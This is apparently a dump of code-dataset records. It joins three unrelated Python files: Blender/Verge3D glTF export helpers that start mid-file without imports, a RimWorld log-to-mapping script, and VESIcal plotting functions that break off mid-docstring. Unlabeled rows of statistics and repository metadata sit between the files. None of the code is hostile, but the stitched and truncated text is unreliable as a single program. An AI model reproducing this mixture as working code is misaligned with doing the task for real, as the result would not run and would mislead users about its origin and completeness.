def matIsBlend(bl_mat):
    return bl_mat.blend_method in ['BLEND', 'MULTIPLY', 'ADD']


def updateOrbitCameraView(cam_obj, scene):
    """Re-orient an orbit camera so that it looks at its orbit target."""
    target_obj = cam_obj.data.v3d.orbit_target_object

    eye = cam_obj.matrix_world.to_translation()
    target = (cam_obj.data.v3d.orbit_target if target_obj is None
            else target_obj.matrix_world.to_translation())

    quat = getLookAtAlignedUpMatrix(eye, target).to_quaternion()
    quat.rotate(cam_obj.matrix_world.inverted())
    quat.rotate(cam_obj.matrix_basis)

    rot_mode = cam_obj.rotation_mode
    cam_obj.rotation_mode = 'QUATERNION'
    cam_obj.rotation_quaternion = quat
    cam_obj.rotation_mode = rot_mode

    # need to update the camera state (i.e. world matrix) immediately in case of
    # several consecutive UI updates
    bpy.context.view_layer.update()


def getLookAtAlignedUpMatrix(eye, target):
    """
    This method uses camera axes for building the matrix.
    """
    axis_z = (eye - target).normalized()

    if axis_z.length == 0:
        axis_z = mathutils.Vector((0, -1, 0))

    axis_x = mathutils.Vector((0, 0, 1)).cross(axis_z)

    if axis_x.length == 0:
        axis_x = mathutils.Vector((1, 0, 0))

    axis_y = axis_z.cross(axis_x)

    return mathutils.Matrix([
        axis_x,
        axis_y,
        axis_z,
    ]).transposed()


def objDataUsesLineRendering(bl_obj_data):
    """True if the object data has Verge3D line rendering enabled."""
    line_settings = getattr(getattr(bl_obj_data, 'v3d', None),
            'line_rendering_settings', None)
    return bool(line_settings and line_settings.enable)


def getObjectAllCollections(blObj):
    """Return every collection (including nested ones) that contains blObj."""
    return [coll for coll in bpy.data.collections if blObj in coll.all_objects[:]]


def getBlurPixelRadius(context, blLight):
    """Approximate the shadow blur radius (in pixels) for the given light."""
    if blLight.type == 'SUN':
        relativeRadius = (blLight.shadow_buffer_soft / 100
                * int(context.scene.eevee.shadow_cascade_size))
        # blur strength doesn't increase after a certain point
        return min(max(relativeRadius, 0), 100)
    else:
        blurGrade = math.floor(blLight.shadow_buffer_soft
                * int(context.scene.eevee.shadow_cube_size) / 1000)
        blurGrade = min(blurGrade, 9)

        # some approximation of Blender blur radius
        if blurGrade > 2:
            return 4.22 * (blurGrade - 1.5)
        else:
            return blurGrade


def objHasExportedModifiers(obj):
    """
    Check if an object has any modifiers that should be applied before export.
    """
    return any([modifierNeedsExport(mod) for mod in obj.modifiers])


def obj_del_not_exported_modifiers(obj):
    """
    Remove modifiers that shouldn't be applied before export from an object.
    """
    for mod in obj.modifiers:
        if not modifierNeedsExport(mod):
            obj.modifiers.remove(mod)


def objAddTriModifier(obj):
    """Append a temporary triangulation modifier preserving custom normals."""
    mod = obj.modifiers.new('Temporary_Triangulation', 'TRIANGULATE')
    mod.quad_method = 'FIXED'
    mod.keep_custom_normals = True


def objApplyModifiers(obj):
    """
    Creates a new mesh from applying modifiers to the mesh of the given object.
    Assigns the newly created mesh to the given object. The old mesh's user
    count will be decreased by 1.
    """
    dg = bpy.context.evaluated_depsgraph_get()

    need_linking = dg.scene.collection.objects.find(obj.name) == -1
    need_showing = obj.hide_viewport

    # NOTE: link the object if it's not in the 'Master Collection' and update
    # the view layer to make the depsgraph able to apply modifiers to the object
    if need_linking:
        dg.scene.collection.objects.link(obj)
        obj.update_tag()

    # a hidden object doesn't get its modifiers applied, need to make it visible
    # before updating the view layer
    if need_showing:
        obj.hide_viewport = False

    bpy.context.view_layer.update()

    # NOTE: some modifiers can remove UV layers from an object after applying
    # (e.g. Skin), which is a consistent behavior regarding uv usage in the
    # viewport (e.g. degenerate tangent space in the Normal Map node)
    obj_eval = obj.evaluated_get(dg)
    obj.data = bpy.data.meshes.new_from_object(obj_eval,
            preserve_all_data_layers=True, depsgraph=dg)
    obj.modifiers.clear()

    if need_linking:
        dg.scene.collection.objects.unlink(obj)
    if need_showing:
        obj.hide_viewport = True


def objTransferShapeKeys(obj_from, obj_to, depsgraph):
    """
    Transfer shape keys from one object to another if it's possible:
        - obj_from should be in the current view layer to be evaluated by depsgraph
        - obj_to should not have shape keys
        - obj_from (after evaluating) and obj_to should have the same amount of
          vertices

    Returns a boolean flag indicating successful transfer.
    """
    if obj_from.data.shape_keys is None:
        return True

    key_blocks_from = obj_from.data.shape_keys.key_blocks
    keys_from = [key for key in key_blocks_from if key != key.relative_key
            and key != obj_from.data.shape_keys.reference_key]
    key_names = [key.name for key in keys_from]
    key_values = [key.value for key in keys_from]
    key_positions = []

    # zero out all keys so each one can be sampled in isolation
    for key in keys_from:
        key.value = 0

    same_vertex_count = True
    for key in keys_from:
        key.value = 1

        obj_from.update_tag()
        bpy.context.view_layer.update()
        verts = obj_from.evaluated_get(depsgraph).data.vertices

        if len(verts) != len(obj_to.data.vertices):
            same_vertex_count = False
            break

        key_pos = [0] * 3 * len(verts)
        verts.foreach_get('co', key_pos)
        key_positions.append(key_pos)

        key.value = 0

    if same_vertex_count:
        # basis shape key
        obj_to.shape_key_add(name=obj_from.data.shape_keys.reference_key.name)

        vert_co = [0] * 3 * len(obj_to.data.vertices)
        for i in range(len(key_names)):
            key_block = obj_to.shape_key_add(name=key_names[i])
            key_block.value = key_values[i]
            key_block.data.foreach_set('co', key_positions[i])
    else:
        # don't create nothing if vertex count isn't constant
        pass

    # restore the original key values on the source object
    for i in range(len(keys_from)):
        keys_from[i].value = key_values[i]

    return same_vertex_count


def meshNeedTangentsForExport(mesh, optimize_tangents):
    """
    Check if it's needed to export tangents for the given mesh.
    """
    return (meshHasUvLayers(mesh) and (meshMaterialsUseTangents(mesh)
            or not optimize_tangents))


def meshHasUvLayers(mesh):
    return bool(mesh.uv_layers.active and len(mesh.uv_layers) > 0)


def meshMaterialsUseTangents(mesh):
    """True if any material node tree on the mesh requires tangent data."""
    for mat in mesh.materials:
        if mat and mat.use_nodes and mat.node_tree != None:
            node_trees = extractMaterialNodeTrees(mat.node_tree)
            for node_tree in node_trees:
                for bl_node in node_tree.nodes:
                    if matNodeUseTangents(bl_node):
                        return True

        # HACK: in most cases this one indicates that object linking is used
        # disable tangent optimizations for such cases
        elif mat == None:
            return True

    return False


def matNodeUseTangents(bl_node):
    """True if the given shader node reads tangent data."""
    if isinstance(bl_node, bpy.types.ShaderNodeNormalMap):
        return True

    if (isinstance(bl_node, bpy.types.ShaderNodeTangent)
            and bl_node.direction_type == 'UV_MAP'):
        return True

    if isinstance(bl_node, bpy.types.ShaderNodeNewGeometry):
        for out in bl_node.outputs:
            if out.identifier == 'Tangent' and out.is_linked:
                return True

    return False


def extractMaterialNodeTrees(node_tree):
    """NOTE: located here since it's needed for meshMaterialsUseTangents()"""
    out = [node_tree]

    for bl_node in node_tree.nodes:
        if isinstance(bl_node, bpy.types.ShaderNodeGroup):
            out += extractMaterialNodeTrees(bl_node.node_tree)

    return out


def meshHasNgons(mesh):
    for poly in mesh.polygons:
        if poly.loop_total > 4:
            return True

    return False


def modifierNeedsExport(mod):
    """
    Modifiers that are applied before export shouldn't be:
        - hidden during render (a way to disable export of a modifier)
        - ARMATURE modifiers (used separately via skinning)
    """
    return mod.show_render and mod.type != 'ARMATURE'


def getSocketDefvalCompat(socket, RGBAToRGB=False, isOSL=False):
    """
    Get the default value of input/output sockets in some compatible form.

    Vector types such as bpy_prop_aray, Vector, Euler, etc... are converted
    to lists, primitive types are converted to int/float.
    """
    if socket.type == 'VALUE' or socket.type == 'INT':
        return socket.default_value
    elif socket.type == 'BOOLEAN':
        return int(socket.default_value)
    elif socket.type == 'VECTOR':
        return [i for i in socket.default_value]
    elif socket.type == 'RGBA':
        val = [i for i in socket.default_value]
        if RGBAToRGB:
            val = val[0:3]
        return val
    elif socket.type == 'SHADER':
        # shader sockets have no default value
        return [0, 0, 0, 0]
    elif socket.type == 'STRING' and isOSL:
        # for now used for OSL only
        return pyosl.glslgen.string_to_osl_const(socket.default_value)
    elif socket.type == 'CUSTOM':
        # not supported
        return 0
    else:
        return 0


def createCustomProperty(bl_element):
    """
    Filters and creates a custom property, which is stored in the glTF extra
    field.
    """
    if not bl_element:
        return None

    props = {}

    # Custom properties, which are in most cases present and should not be
    # exported.
    black_list = ['cycles', 'cycles_visibility', 'cycles_curves', '_RNA_UI',
            'v3d']

    count = 0
    for custom_property in bl_element.keys():
        if custom_property in black_list:
            continue

        value = bl_element[custom_property]

        add_value = False

        if isinstance(value, str):
            add_value = True

        if isinstance(value, (int, float)):
            add_value = True

        if hasattr(value, "to_list"):
            value = value.to_list()
            add_value = True

        if add_value:
            props[custom_property] = value
            count += 1

    if count == 0:
        return None

    return props


def calcLightThresholdDist(bl_light, threshold):
    """Calculate the light attenuation distance from the given threshold.

    The light power at this distance equals the threshold value.
    """
    return math.sqrt(max(1e-16, max(bl_light.color.r, bl_light.color.g,
            bl_light.color.b)
            * max(1, bl_light.specular_factor)
            * abs(bl_light.energy / 100)
            / max(threshold, 1e-16)
    ))
29.525292
95
0.669412
2,053
15,176
4.806624
0.253288
0.006688
0.008512
0.011552
0.178354
0.116842
0.043575
0.012566
0
0
0
0.010884
0.243213
15,176
513
96
29.582846
0.848324
0.244201
0
0.1777
0
0
0.024144
0.005991
0
0
0
0
0
1
0.121951
false
0.003484
0.017422
0.02439
0.313589
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99c67008a5b97aeb98ea7d651117dafc25583098
531
py
Python
scripts/generate_story_map.py
afit/rimworld-save-migrator
a142dcef807e58a471b8bd840e4c4416ced73173
[ "MIT" ]
3
2018-07-02T23:36:52.000Z
2019-01-21T17:16:35.000Z
scripts/generate_story_map.py
afit/rimworld-save-migrator
a142dcef807e58a471b8bd840e4c4416ced73173
[ "MIT" ]
null
null
null
scripts/generate_story_map.py
afit/rimworld-save-migrator
a142dcef807e58a471b8bd840e4c4416ced73173
[ "MIT" ]
null
null
null
#!/usr/bin/python
# Look at the story mappings from rimworld.log:
#   cat rimworld.log | grep backstory | sort -u > stories.txt
# RimWorld handles the mappings, but pollutes its log when it does so.
#
# NOTE(review): ported to Python 3 — the original used Python 2 print
# statements, which are a syntax error under Python 3. The emitted text is
# byte-identical to the original script's output.

# Emit a Python dict literal mapping backstory identifiers taken from the
# log lines (field 7 -> field 12; 'close match' lines map to 'VideoGamer91').
with open('stories.txt') as stories:
    print('mappings = {')
    for line in stories:
        fields = line.strip().split(' ')
        if 'Giving random' in line:
            # randomly-assigned backstories carry no usable mapping
            continue
        elif 'or any close match' in line:
            print('\t\'%s\': \'VideoGamer91\',' % (fields[6].replace(',', '')))
        else:
            print('\t\'%s\': \'%s\',' % (fields[6], fields[11],))
    print('}')
24.136364
73
0.563089
77
531
3.883117
0.675325
0.073579
0.046823
0
0
0
0
0
0
0
0
0.014963
0.244821
531
21
74
25.285714
0.730673
0.354049
0
0
0
0
0.20944
0
0
0
0
0
0
0
null
null
0
0
null
null
0.363636
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
99c8bc3429d14ce3a02ee120f70154934756c968
37,815
py
Python
VESIcal/vplot.py
kaylai/VESIcal
3ea18b0ce30b30fb55786346c37ef8f428ee5034
[ "MIT" ]
16
2020-06-22T09:07:32.000Z
2022-01-12T13:42:12.000Z
VESIcal/vplot.py
kaylai/VESIcal
3ea18b0ce30b30fb55786346c37ef8f428ee5034
[ "MIT" ]
136
2020-05-22T21:43:23.000Z
2022-03-07T22:06:33.000Z
build/lib/VESIcal/vplot.py
kaylai/VESIcal
3ea18b0ce30b30fb55786346c37ef8f428ee5034
[ "MIT" ]
3
2021-05-18T08:21:02.000Z
2022-03-25T01:08:10.000Z
from VESIcal import core from VESIcal import calibrations from VESIcal.tasplot import add_LeMaitre_fields import pandas as pd import numpy as np import warnings as w import matplotlib as mpl import matplotlib.pyplot as plt # ---------- DEFINE CUSTOM PLOTTING FORMATTING ------------ # style = "seaborn-colorblind" plt.style.use(style) plt.rcParams["mathtext.default"] = "regular" plt.rcParams["mathtext.fontset"] = "dejavusans" mpl.rcParams['patch.linewidth'] = 1 mpl.rcParams['axes.linewidth'] = 1 plt.rcParams['axes.titlesize'] = 20 plt.rcParams['axes.labelsize'] = 18 plt.rcParams['xtick.labelsize'] = 14 plt.rcParams['ytick.labelsize'] = 14 plt.rcParams['legend.fontsize'] = 14 mpl.rcParams['lines.markersize'] = 10 # Define color cycler based on plot style set here # get style formatting set by plt.style.use(): the_rc = plt.style.library[style] # list of colors by hex code: color_list = the_rc['axes.prop_cycle'].by_key()['color'] * 10 color_cyler = the_rc['axes.prop_cycle'] # get the cycler # ----------- MAGMASAT PLOTTING FUNCTIONS ----------- # def smooth_isobars_and_isopleths(isobars=None, isopleths=None): """ Takes in a dataframe with calculated isobar and isopleth information (e.g., output from calculate_isobars_and_isopleths) and smooths the data for plotting. Parameters ---------- isobars: pandas DataFrame OPTIONAL. DataFrame object containing isobar information as calculated by calculate_isobars_and_isopleths. isopleths: pandas DataFrame OPTIONAL. DataFrame object containing isopleth information as calculated by calculate_isobars_and_isopleths. Returns ------- pandas DataFrame DataFrame with x and y values for all isobars and all isopleths. Useful if a user wishes to do custom plotting with isobar and isopleth data rather than using the built-in `plot_isobars_and_isopleths()` function. 
""" np.seterr(divide='ignore', invalid='ignore') # turn off numpy warning w.filterwarnings("ignore", message="Polyfit may be poorly conditioned") if isobars is not None: P_vals = isobars.Pressure.unique() isobars_lists = isobars.values.tolist() # add zero values to volatiles list isobars_lists.append([0.0, 0.0, 0.0, 0.0]) isobars_pressure = [] isobars_H2O_liq = [] isobars_CO2_liq = [] # do some data smoothing for pressure in P_vals: Pxs = [item[1] for item in isobars_lists if item[0] == pressure] Pys = [item[2] for item in isobars_lists if item[0] == pressure] try: # calcualte polynomial Pz = np.polyfit(Pxs, Pys, 3) Pf = np.poly1d(Pz) # calculate new x's and y's Px_new = np.linspace(Pxs[0], Pxs[-1], 50) Py_new = Pf(Px_new) # Save x's and y's Px_new_list = list(Px_new) isobars_H2O_liq += Px_new_list Py_new_list = list(Py_new) isobars_CO2_liq += Py_new_list pressure_vals_for_list = [pressure]*len(Px_new) isobars_pressure += pressure_vals_for_list except Exception: Px_list = list(Pxs) isobars_H2O_liq += Px_list Py_list = list(Pys) isobars_CO2_liq += Py_list pressure_vals_for_list = [pressure]*len(Pxs) isobars_pressure += pressure_vals_for_list isobar_df = pd.DataFrame({"Pressure": isobars_pressure, "H2O_liq": isobars_H2O_liq, "CO2_liq": isobars_CO2_liq}) if isopleths is not None: XH2O_vals = isopleths.XH2O_fl.unique() isopleths_lists = isopleths.values.tolist() isopleths_XH2O_fl = [] isopleths_H2O_liq = [] isopleths_CO2_liq = [] for Xfl in XH2O_vals: Xxs = [item[1] for item in isopleths_lists if item[0] == Xfl] Xys = [item[2] for item in isopleths_lists if item[0] == Xfl] try: # calculate polynomial Xz = np.polyfit(Xxs, Xys, 2) Xf = np.poly1d(Xz) # calculate new x's and y's Xx_new = np.linspace(Xxs[0], Xxs[-1], 50) Xy_new = Xf(Xx_new) # Save x's and y's Xx_new_list = list(Xx_new) isopleths_H2O_liq += Xx_new_list Xy_new_list = list(Xy_new) isopleths_CO2_liq += Xy_new_list XH2Ofl_vals_for_list = [Xfl]*len(Xx_new) isopleths_XH2O_fl += XH2Ofl_vals_for_list except 
Exception: Xx_list = list(Xxs) isopleths_H2O_liq += Xx_list Xy_list = list(Xys) isopleths_CO2_liq += Xy_list XH2Ofl_vals_for_list = [Xfl]*len(Xxs) isopleths_XH2O_fl += XH2Ofl_vals_for_list isopleth_df = pd.DataFrame({"XH2O_fl": isopleths_XH2O_fl, "H2O_liq": isopleths_H2O_liq, "CO2_liq": isopleths_CO2_liq}) np.seterr(divide='warn', invalid='warn') # turn numpy warning back on w.filterwarnings("always", message="Polyfit may be poorly conditioned") if isobars is not None: if isopleths is not None: return isobar_df, isopleth_df else: return isobar_df else: if isopleths is not None: return isopleth_df def plot(isobars=None, isopleths=None, degassing_paths=None, custom_H2O=None, custom_CO2=None, isobar_labels=None, isopleth_labels=None, degassing_path_labels=None, custom_labels=None, custom_colors="VESIcal", custom_symbols=None, markersize=10, figsize=(12, 8), save_fig=False, extend_isobars_to_zero=True, smooth_isobars=False, smooth_isopleths=False, **kwargs): """ Custom automatic plotting of model calculations in VESIcal. Isobars, isopleths, and degassing paths can be plotted. Labels can be specified for each. Any combination of isobars, isopleths, and degassing paths can be plotted. Parameters ---------- isobars: pandas DataFrame or list OPTIONAL. DataFrame object containing isobar information as calculated by calculate_isobars_and_isopleths. Or a list of DataFrame objects. isopleths: pandas DataFrame or list OPTIONAL. DataFrame object containing isopleth information as calculated by calculate_isobars_and_isopleths. Or a list of DataFrame objects. degassing_paths: list OPTIONAL. List of DataFrames with degassing information as generated by calculate_degassing_path(). custom_H2O: list OPTIONAL. List of groups of H2O values to plot as points. For example myfile.data['H2O'] is one group of H2O values. Must be passed with custom_CO2 and must be same length as custom_CO2. custom_CO2: list OPTIONAL. 
List of groups of CO2 values to plot as points.For example myfile.data['CO2'] is one group of CO2 values. Must be passed with custom_H2O and must be same length as custom_H2O. isobar_labels: list OPTIONAL. Labels for the plot legend. Default is None, in which case each plotted line will be given the generic legend name of "Isobars n", with n referring to the nth isobars passed. Isobar pressure is given in parentheses. The user can pass their own labels as a list of strings. If more than one set of isobars is passed, the labels should refer to each set of isobars, not each pressure. isopleth_labels: list OPTIONAL. Labels for the plot legend. Default is None, in which case each plotted isopleth will be given the generic legend name of "Isopleth n", with n referring to the nth isopleths passed. Isopleth XH2O values are given in parentheses. The user can pass their own labels as a list of strings. If more than one set of isopleths is passed, the labels should refer to each set of isopleths, not each XH2O value. degassing_path_labels: list OPTIONAL. Labels for the plot legend. Default is None, in which case each plotted line will be given the generic legend name of "Pathn", with n referring to the nth degassing path passed. The user can pass their own labels as a list of strings. custom_labels: list OPTIONAL. Labels for the plot legend. Default is None, in which case each group of custom points will be given the generic legend name of "Customn", with n referring to the nth degassing path passed. The user can pass their own labels as a list of strings. custom_colors: list OPTIONAL. Default value is "VESIcal", which uses VESIcal's color ramp. A list of color values readable by matplotlib can be passed here if custom symbol colors are desired. The length of this list must match that of custom_H2O and custom_CO2. custom_symbols: list OPTIONAL. Default value is None, in which case data are plotted as filled circles.. 
A list of symbol tyles readable by matplotlib can be passed here if custom symbol types are desired. The length of this list must match that of custom_H2O and custom_CO2. markersize: int OPTIONAL. Default value is 10. Same as markersize kwarg in matplotlib. Any numeric value passed here will set the marker size for (custom_H2O, custom_CO2) points. figsize: tuple OPTIONAL. Default value is (12,8). Sets the matplotlib.pyplot figsize value as (x_dimension, y_dimension) save_fig: False or str OPTIONAL. Default value is False, in which case the figure will not be saved. If a string is passed, the figure will be saved with the string as the filename. The string must include the file extension. extend_isobars_to_zero: bool OPTIONAL. If True (default), isobars will be extended to zero, even if there is a finite solubility at zero partial pressure. smooth_isobars: bool OPTIONAL. Default is False. If set to True, isobar data will be fit to a polynomial and plotted. If False, the raw input data will be plotted. smooth_isopleths: bool OPTIONAL. Default is False. If set to True, isopleth data will be fit to a polynomial and plotted. If False, the raw input data will be plotted. Returns ------- fig, axes Matplotlib objects fig and axes matploblib objects defining a plot with x-axis as H2O wt% in the melt and y-axis as CO2 wt%in the melt. Isobars, or lines of constant pressure at which the sample magma composition is saturated, and isopleths, or lines of constant fluid composition at which the sample magma composition is saturated, are plotted if passed. Degassing paths, or the concentration of dissolved H2O and CO2 in a melt equilibrated along a path of decreasing pressure, is plotted if passed. 
""" # Turn off warnings: np.seterr(divide='ignore', invalid='ignore') # turn off numpy warning w.filterwarnings("ignore", message="Polyfit may be poorly conditioned") def check_inputs(custom_H2O, custom_CO2): if custom_H2O is not None: if custom_CO2 is None: raise core.InputError("If x data is passed, y data must also " "be passed.") else: if len(custom_H2O) == len(custom_CO2): pass else: raise core.InputError("x and y data must be same length") if custom_CO2 is not None: if custom_H2O is None: raise core.InputError("If y data is passed, x data must also " "be passed.") def check_colors(custom_colors): if custom_colors == "VESIcal": use_colors = color_list elif isinstance(custom_colors, list): use_colors = custom_colors else: raise core.InputError("Argument custom_colors must be type list. " "Just passing one item? Try putting square " "brackets, [], around it.") return use_colors def calc_extend_isobars_to_zero(Pxs, Pys): """ Calculates new end-points for plotting isobars when extend_isobars_to_zero option is set to True. Parameters ---------- Pxs, Pys: list List of x and y values corresponding to isobars. 
""" if Pxs[0]*Pys[0] != 0.0: if Pxs[0] > Pys[0]: # create new array of length n+1 if n is the length of the # original array: Px_new = np.zeros(np.shape(Pxs)[0]+1) # set the first x value in the new array equal to 0: Px_new[0] = 0 # fill the rest of the new array with the original array # values: Px_new[1:] = Pxs # overwrite the original array with the new one: Pxs = Px_new Py_new = np.zeros(np.shape(Pys)[0]+1) Py_new[0] = Pys[0] Py_new[1:] = Pys Pys = Py_new else: Px_new = np.zeros(np.shape(Pxs)[0]+1) Px_new[0] = Pxs[0] Px_new[1:] = Pxs Pxs = Px_new Py_new = np.zeros(np.shape(Pys)[0]+1) Py_new[0] = 0 Py_new[1:] = Pys Pys = Py_new if Pxs[-1]*Pys[-1] != 0.0: if Pxs[-1] < Pys[-1]: Px_new = np.zeros(np.shape(Pxs)[0]+1) Px_new[-1] = 0 Px_new[:-1] = Pxs Pxs = Px_new Py_new = np.zeros(np.shape(Pys)[0]+1) Py_new[-1] = Pys[-1] Py_new[:-1] = Pys Pys = Py_new else: Px_new = np.zeros(np.shape(Pxs)[0]+1) Px_new[-1] = Pxs[-1] Px_new[:-1] = Pxs Pxs = Px_new Py_new = np.zeros(np.shape(Pys)[0]+1) Py_new[-1] = 0 Py_new[:-1] = Pys Pys = Py_new return Pxs, Pys # -------- HANDLE USER INPUT ERRORS, SET COLORS, SMOOTH LINES -------- ## check_inputs(custom_H2O=custom_H2O, custom_CO2=custom_CO2) use_colors = check_colors(custom_colors=custom_colors) if smooth_isobars: isobars = smooth_isobars_and_isopleths(isobars=isobars) if smooth_isopleths: isopleths = smooth_isobars_and_isopleths(isopleths=isopleths) # -------- CREATE FIGURE -------- ## fig, ax = plt.subplots(figsize=figsize) if 'custom_x' in kwargs: ax.set(xlabel=kwargs['xlabel'], ylabel=kwargs['ylabel']) else: ax.set(xlabel='H$_2$O wt%', ylabel='CO$_2$ wt%') labels = [] # -------- PLOT ISOBARS -------- ## if isobars is not None: if isinstance(isobars, pd.DataFrame): isobars = [isobars] for i in range(len(isobars)): P_vals = isobars[i].Pressure.unique() isobars_lists = isobars[i].values.tolist() # add zero values to volatiles list isobars_lists.append([0.0, 0.0, 0.0, 0.0]) P_iter = 0 for pressure in P_vals: P_iter += 1 Pxs = [item[1] 
for item in isobars_lists if item[0] == pressure] Pys = [item[2] for item in isobars_lists if item[0] == pressure] if extend_isobars_to_zero: try: Pxs, Pys = calc_extend_isobars_to_zero(Pxs, Pys) except Exception: pass else: print(extend_isobars_to_zero) if len(isobars) > 1: if P_iter == 1: P_list = [int(i) for i in P_vals] if isinstance(isobar_labels, list): labels.append(str(isobar_labels[i]) + ' (' + ', '.join(map(str, P_list)) + " bars)") else: labels.append('Isobars ' + str(i+1) + ' (' + ', '.join(map(str, P_list)) + " bars)") else: labels.append('_nolegend_') if len(isobars) > 1: ax.plot(Pxs, Pys, color=color_list[i]) else: ax.plot(Pxs, Pys) if len(isobars) == 1: labels += [str(P_val) + " bars" for P_val in P_vals] # -------- PLOT ISOPLETHS -------- ## if isopleths is not None: if isinstance(isopleths, pd.DataFrame): isopleths = [isopleths] for i in range(len(isopleths)): XH2O_vals = isopleths[i].XH2O_fl.unique() isopleths_lists = isopleths[i].values.tolist() H_iter = 0 for Xfl in XH2O_vals: H_iter += 1 Xxs = [item[1] for item in isopleths_lists if item[0] == Xfl] Xys = [item[2] for item in isopleths_lists if item[0] == Xfl] if len(isopleths) > 1: if H_iter == 1: H_list = [i for i in XH2O_vals] if isinstance(isopleth_labels, list): labels.append(str(isopleth_labels[i]) + ' (' + ', '.join(map(str, H_list)) + " XH2Ofluid)") else: labels.append('Isopleths ' + str(i+1) + ' (' + ', '.join(map(str, H_list)) + " XH2Ofluid)") else: labels.append('_nolegend_') ax.plot(Xxs, Xys, ls='dashed', color=color_list[i]) if len(isopleths) == 1: H_list = [i for i in XH2O_vals] if H_iter == 1: labels.append('Isopleths (' + ', '.join(map(str, H_list)) + " XH2Ofluid)") else: labels.append('_nolegend_') ax.plot(Xxs, Xys, ls='dashed', color='k') # -------- PLOT DEGASSING PATHS -------- ## if degassing_paths is not None: if isinstance(degassing_paths, pd.DataFrame): degassing_paths = [degassing_paths] degassing_colors = color_list.copy() iterno = 0 for i in 
range(len(degassing_paths)): if degassing_path_labels is None: iterno += 1 labels.append('Path%s' % iterno) ax.plot(degassing_paths[i]["H2O_liq"], degassing_paths[i]["CO2_liq"], ls='dotted', color=degassing_colors[i]) else: labels.append(degassing_path_labels[iterno]) ax.plot(degassing_paths[i]["H2O_liq"], degassing_paths[i]["CO2_liq"], ls='dotted', color=degassing_colors[i]) iterno += 1 for i in range(len(degassing_paths)): ax.plot(degassing_paths[i]["H2O_liq"].max(), degassing_paths[i]["CO2_liq"].max(), 'o', color=degassing_colors[i]) labels.append('_nolegend_') # -------- PLOT CUSTOM H2O-CO2 -------- ## if custom_H2O is not None and custom_CO2 is not None: if isinstance(custom_H2O, pd.DataFrame): custom_H2O = [custom_H2O] if isinstance(custom_CO2, pd.DataFrame): custom_CO2 = [custom_CO2] if custom_symbols is None: use_marker = ['o'] * len(custom_H2O) else: use_marker = custom_symbols iterno = 0 for i in range(len(custom_H2O)): if custom_labels is None: iterno += 1 labels.append('Custom%s' % iterno) ax.plot(custom_H2O[i], custom_CO2[i], use_marker[i], color=use_colors[i], markersize=markersize) else: labels.append(custom_labels[iterno]) ax.plot(custom_H2O[i], custom_CO2[i], use_marker[i], color=use_colors[i], markersize=markersize) iterno += 1 # -------- PLOT CUSTOM X-Y -------- ## if 'custom_x' in kwargs: custom_x = kwargs['custom_x'] custom_y = kwargs['custom_y'] if isinstance(custom_x, pd.core.series.Series): custom_x = [list(custom_x.values)] if isinstance(custom_y, pd.core.series.Series): custom_y = [list(custom_y.values)] if custom_symbols is None: use_marker = ['o'] * len(custom_x) else: use_marker = custom_symbols iterno = 0 for i in range(len(custom_x)): if custom_labels is None: iterno += 1 labels.append('Custom%s' % iterno) ax.plot(custom_x[i], custom_y[i], use_marker[i], color=use_colors[i], markersize=markersize) else: labels.append(custom_labels[iterno]) ax.plot(custom_x[i], custom_y[i], use_marker[i], color=use_colors[i], markersize=markersize) 
iterno += 1 # -------- PLOT LEGEND -------- ## ax.legend(labels, bbox_to_anchor=(1.01, 1), loc='upper left') if 'custom_x' not in kwargs: ax.set_xlim(left=0) ax.set_ylim(bottom=0) np.seterr(divide='warn', invalid='warn') # turn numpy warning back on w.filterwarnings("always", message="Polyfit may be poorly conditioned") # -------- SAVE FIGURE IF DESIRED -------- ## if save_fig is not False: fig.savefig(save_fig) return fig, ax def scatterplot(custom_x, custom_y, xlabel=None, ylabel=None, **kwargs): """ Custom x-y plotting using VESIcal's built-in plot() function, built Matplotlib's plot and scatter functions. Parameters ---------- custom_x: list List of groups of x-values to plot as points or lines custom_y: list List of groups of y-values to plot as points or lines xlabel: str OPTIONAL. What to display along the x-axis. ylabel: str OPTIONAL. What to display along the y-axis. kwargs: Can take in any key word agruments that can be passed to `plot()`. Returns ------- fig, ax matplotlib objects X-y plot with custom x and y axis values and labels. """ if isinstance(custom_x, list) and isinstance(custom_y, list): if len(custom_x) != len(custom_y): raise core.InputError("X and y lists must be same length") if xlabel is not None: if isinstance(xlabel, str): pass else: raise core.InputError("xlabel must be string") if ylabel is not None: if isinstance(ylabel, str): pass else: raise core.InputError("ylabel must be string") return plot(custom_x=custom_x, custom_y=custom_y, xlabel=xlabel, ylabel=ylabel, **kwargs) # ------- Define custom plotting tools for checking calibrations ------- # def calib_plot(user_data=None, model='all', plot_type='TAS', zoom=None, figsize=(17, 8), legend=True, save_fig=False, **kwargs): """ Plots user data and calibration set of any or all models on any x-y plot or a total alkalis vs silica (TAS) diagram. TAS diagram boundaries provided by tasplot python module, copyright John A Stevenson. 
Parameters ---------- user_data: BatchFile object, Sample object, pandas DataFrame, pandas Series, or dict. OPTIONAL. Default value is None, in which case only the model calibration set is plotted. User provided sample data describing the oxide composition of one or more samples. Multiple samples can be passed as an BatchFile object or pandas DataFrame. A single sample can be passed as a pandas Series. model: str or list OPTIONAL. Default value is 'all', in which case all model calibration datasets will be plotted. 'Mixed' can be used to plot all mixed fluid models. String of the name of the model calibration dataset to plot (e.g., 'Shishkina'). Multiple models can be plotted by passing them as strings within a list (e.g., ['Shishkina', 'Dixon']). plot_type: str OPTIONAL. Default value is 'TAS', which returns a total alkali vs silica (TAS) diagram. Any two oxides can be plotted as an x-y plot by setting plot_type='xy' and specifying x- and y-axis oxides, e.g., x='SiO2', y='Al2O3'. zoom: str or list OPTIONAL. Default value is None in which case axes will be set to the default of 35<x<100 wt% and 0<y<25 wt% for TAS type plots and the best values to show the data for xy type plots. Can pass "user_data" to plot the figure where the x and y axes are scaled down to zoom in and only show the region surrounding the user_data. A list of tuples may be passed to manually specify x and y limits. Pass in data as [(x_min, x_max), (y_min, y_max)]. For example, the default limits here would be passed in as [(35,100), (0,25)]. figsize: tuple OPTIONAL. Default value is (17,8). Sets the matplotlib.pyplot figsize value as (x_dimension, y_dimension). legend: bool OPTIONAL. Default value is True. Can be set to False in which case the legend will not be displayed. save_fig: False or str OPTIONAL. Default value is False, in which case the figure will not be saved. If a string is passed, the figure will be saved with the string as the filename. The string must include the file extension. 
